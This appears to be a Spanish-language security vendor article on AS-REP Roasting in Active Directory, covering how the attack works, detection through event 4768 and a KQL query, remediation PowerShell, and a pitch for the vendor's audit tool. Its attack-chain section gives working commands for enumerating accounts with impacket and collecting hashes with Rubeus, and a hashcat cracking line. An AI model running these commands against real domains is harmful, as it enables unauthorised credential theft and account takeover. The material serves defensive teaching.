Que es el AS-REP Roasting?
El AS-REP Roasting es un ataque de Active Directory que apunta a cuentas con la preautenticacion Kerberos deshabilitada. Cualquier atacante, incluso sin credenciales, puede solicitar una respuesta AS-REP para estas cuentas y recibir un blob cifrado con su hash de contrasena, listo para crackear sin conexion.
A diferencia del Kerberoasting, el AS-REP Roasting no requiere ninguna credencial si el atacante tiene acceso de red al dominio. Es uno de los ataques de menor friccion en Active Directory.
La vulnerabilidad proviene de una opcion de Kerberos llamada DONT_REQUIRE_PREAUTH. Cuando esta habilitada, el KDC omite el paso de preautenticacion y emite directamente una AS-REP con datos cifrados con el hash de la cuenta.
⚠️ Diferencia clave con Kerberoasting: El Kerberoasting requiere una cuenta de dominio valida. El AS-REP Roasting puede realizarse sin ninguna credencial, desde fuera del dominio.
Como Funciona
En Kerberos estandar, antes de emitir un TGT, el cliente debe demostrar que conoce la contrasena enviando un timestamp cifrado. Esto evita la recopilacion de hashes sin conexion.
Cuando DONT_REQUIRE_PREAUTH esta establecido, este paso se omite. El KDC responde a cualquier AS-REQ para esa cuenta con una AS-REP que contiene una clave de sesion cifrada con el hash NTLM de la cuenta, sin ninguna prueba de identidad.
La Cadena de Ataque
Paso 1 - Enumerar Cuentas Vulnerables
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} -Properties DoesNotRequirePreAuth, PasswordLastSet |
Select-Object SamAccountName, PasswordLastSet
# Sin credenciales
impacket-GetNPUsers corp.local/ -usersfile users.txt -no-pass -dc-ip 10.10.0.1
# Con cuenta de dominio
impacket-GetNPUsers corp.local/user:password -request -dc-ip 10.10.0.1
Paso 2 - Recopilar Hashes AS-REP
.\Rubeus.exe asreproast /format:hashcat /outfile:asrep_hashes.txt
Paso 3 - Crackear sin Conexion
# Modo 18200 para hashes AS-REP
hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt --rules-file best64.rule
Paso 4 - Toma de Control de la Cuenta
Un hash AS-REP crackeado proporciona la contrasena en texto claro de la cuenta. El atacante puede autenticarse como ese usuario y usar la cuenta como pivote para otros ataques.
Deteccion
Event IDs de Windows
| Event ID | Fuente | Que buscar |
|---|---|---|
| 4768 | DC - Security | AS-REQ con Pre-Authentication Type: 0 — preautenticacion no proporcionada |
| 4768 | DC - Security | Multiples AS-REQ para diferentes cuentas desde la misma IP |
💡 Consejo: Un unico evento 4768 con tipo de pre-auth 0 para una cuenta que normalmente lo requiere es una alerta de alta confianza.
Consulta SIEM (Elastic KQL)
event.code: "4768" AND
winlog.event_data.PreAuthType: "0" AND
winlog.event_data.Status: "0x0"
Remediacion
💡 Accion Rapida: Reactive la preautenticacion en todas las cuentas que la tienen deshabilitada. Es una correccion de una linea por cuenta, sin impacto para el usuario en la mayoria de los casos.
Reactivar la Preautenticacion
# Cuenta individual
Set-ADAccountControl -Identity vulnerable_user -DoesNotRequirePreAuth $false
# Correccion masiva
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} | ForEach-Object {
Set-ADAccountControl -Identity $_ -DoesNotRequirePreAuth $false
Write-Host "Corregido: $($_.SamAccountName)"
}
Auditar y Reforzar
- Identificar todas las cuentas vulnerables:
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} -Properties PasswordLastSet, Description |
Select-Object SamAccountName, PasswordLastSet, Description |
Export-Csv cuentas_vulnerables_asrep.csv -NoTypeInformation
- Rotar contrasenas de cuentas afectadas — incluso despues de reactivar la preautenticacion.
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} | Set-ADUser -ChangePasswordAtLogon $true
- Restringir el acceso LDAP anonimo para evitar la enumeracion no autenticada del flag.
Como EtcSec Detecta Esto
EtcSec senala las cuentas con preautenticacion Kerberos deshabilitada en cada auditoria AD.
La deteccion ASREP_ROASTING_RISK identifica todas las cuentas con DONT_REQUIRE_PREAUTH establecido, independientemente de si ya han sido atacadas.
Controles relacionados:
- PASSWORD_NEVER_EXPIRES - cuentas con preautenticacion deshabilitada y contrasenas que nunca expiran son una superficie de ataque permanente
- PASSWORD_POLICY_WEAK - politica debil hace el cracking mas rapido y probable
- WEAK_KERBEROS_POLICY - configuraciones permisivas amplian la ventana de explotacion
ℹ️ Nota: EtcSec verifica automaticamente estas vulnerabilidades en cada auditoria AD. Ejecute una auditoria gratuita para identificar las cuentas expuestas al AS-REP Roasting.
